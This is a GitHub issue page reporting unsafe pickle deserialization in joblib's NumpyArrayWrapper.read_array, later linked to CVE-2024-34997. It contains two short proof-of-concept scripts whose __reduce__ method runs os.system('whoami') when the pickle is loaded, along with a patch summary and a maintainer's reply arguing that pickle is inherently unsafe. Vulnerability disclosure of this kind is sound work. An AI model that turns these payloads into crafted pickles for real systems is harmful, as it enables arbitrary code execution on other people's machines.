Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

an unsafe use of pickle #1582

Closed
K1ingzzz opened this issue May 6, 2024 · 2 comments
Closed

an unsafe use of pickle #1582

K1ingzzz opened this issue May 6, 2024 · 2 comments

Comments

@K1ingzzz
Copy link

K1ingzzz commented May 6, 2024

Python 3.9.13, joblib 1.4.2

joblib.numpy_pickle::NumpyArrayWrapper().read_array() use pickle.load() to deserialize data, which may allows to execute evil code locally,if the project runs on a public online server,it may cause romate attack through reverse shell.

poc

#test.py
from joblib.numpy_pickle import NumpyArrayWrapper
import os
import pickle
import numpy

class A:
    def __reduce__(self):
        return (os.system,('whoami',))
    
a=A()
with open('testnpyarray.pkl','wb') as file:
    pickle.dump(a,file)

class B:
    def __init__(self,file_handle):
        self.file_handle=file_handle

x=numpy.array([1,'a',{}],dtype=object)
with open('testnpyarray.pkl','rb') as f:
    b=B(f)
    NumpyArrayWrapper(subclass='',shape=[],order='',dtype=x.dtype).read_array(b)

run python .\test.py, and the shell will display your username, that is the result of cmd whoami

@carnil
Copy link

carnil commented May 18, 2024

This issue seems to have gotten CVE-2024-34997 assigned.

danigm added a commit to danigm/joblib that referenced this issue May 20, 2024
This patch adds a new optional argument to the read_array method to
enable pickle. By default the pickle load is disabled.

This is based on the actual code in numpy/lib/format.py:
numpy/numpy@a2bd3a7

Fix CVE-2024-34997, joblib#1582
danigm added a commit to danigm/joblib that referenced this issue May 20, 2024
This patch adds a new optional argument to the read_array method to
enable pickle. By default the pickle load is disabled.

This is based on the actual code in numpy/lib/format.py:
numpy/numpy@a2bd3a7

Fix CVE-2024-34997, joblib#1582
danigm added a commit to danigm/joblib that referenced this issue May 20, 2024
This patch adds a new optional argument to the read_array method to
enable pickle. By default the pickle load is disabled.

This is based on the actual code in numpy/lib/format.py:
numpy/numpy@a2bd3a7

Fix CVE-2024-34997, joblib#1582
@tomMoral
Copy link
Contributor

Hello,

Thanks for the issue, however, I don't think it makes sense in the context of the joblib library.
Note that similar issue has already been discussed in #977

Here, the NumpyArrayWrapper is used internally to persist numpy arrays in the context of sharing objects between two processes/distributed experiments/caching.
One of joblib's goal is to allow the user to serialize any Python object to communicate tasks or results, or to cache results. To achieve this, we need to be as open as possible with our serialization and therefor use the pickle format.

IMO, a simpler and unsafe pattern is even simpler than this:

import os
import pickle

class A:
    def __reduce__(self):
        return (os.system,('whoami',))
    
a=A()

with open('a.pkl','wb') as file:
    pickle.dump(a,file)
with open('a.pkl', 'rb') as file:
    pickle.load(file)

So why add an extra feature to avoid this in a nested case?
We are already making it clear that joblib.load should not be used for inter-user sharing on this page: https://joblib.readthedocs.io/en/stable/generated/joblib.load.html
We could maybe make the NumpyArrayWrapper private to make it clearer it should not be used outside the parallel/caching context if you think this is not clear enough (it is not exposed in the doc).

I am closing this issue for now but feel free to continue the discussion if you think I am missing some points.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants